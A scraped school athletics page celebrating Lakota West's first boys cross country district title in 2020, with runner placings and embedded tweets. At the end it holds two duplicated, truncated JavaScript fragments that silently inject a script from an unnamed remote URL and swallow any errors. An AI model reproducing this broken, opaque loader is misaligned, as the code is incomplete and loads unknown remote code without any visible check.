Cross Country
1st District Title In Boys LWXC History!
Congratulations to the Boys Cross Country Team for winning their first ever District title. Zach Beneteau – 1st, Cole Cronk- 2nd, Kaleb Martin- 3rd, Zach Plotkin-9th, and Sergio Negroe-12th, lMichael Lane-18th, and Nathan Burns- 23rd!
Your top finishers from 2020 @SWDistrict D1 "B" boys cross country race today. See https://t.co/AsxrFstMVM later Sunday for more. @JHoffinCincy @mlaughman @gmcsports @ECC_Sports @firebirdxc @TurpinRunning @WalnutBoysXC @Kings_XC_TF @westfirebirds @TurpinSpartans @kingsathletics pic.twitter.com/a9oNyPIO4z
— Geoff Blankenship (@GeoffSportsPics) October 24, 2020
Congratulations to Zach Beneteau on being the District Champion and for breaking the Lakota West school record! 15:25.1 pic.twitter.com/lc5YVqAVWz
— Lakota West CC (@firebirdxc) October 24, 2020
Here’s your 2020 @OHSAASports District Champion Lakota West Firebirds!#AsAlwaysGoFirebirds pic.twitter.com/gGqg4mP2vl
— Scott Kaufman (@LakotaWestAD) October 24, 2020
What a day!! Congrats Fellas!! https://t.co/775qyus6uF
— Tom Bolden (@CoachTomBolden) October 24, 2020
Congratulations to the West Varsity girls Cross County Team for a fantastic season! Varsity competitors at Districts were Lauren Mang, Kassie Martin, Morgan Stevens, Amane Ohashi, Emily Turner, Ellie Tito, Katelyn Benoit, and Anna Wells.
— Lakota West CC (@firebirdxc) October 25, 2020
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();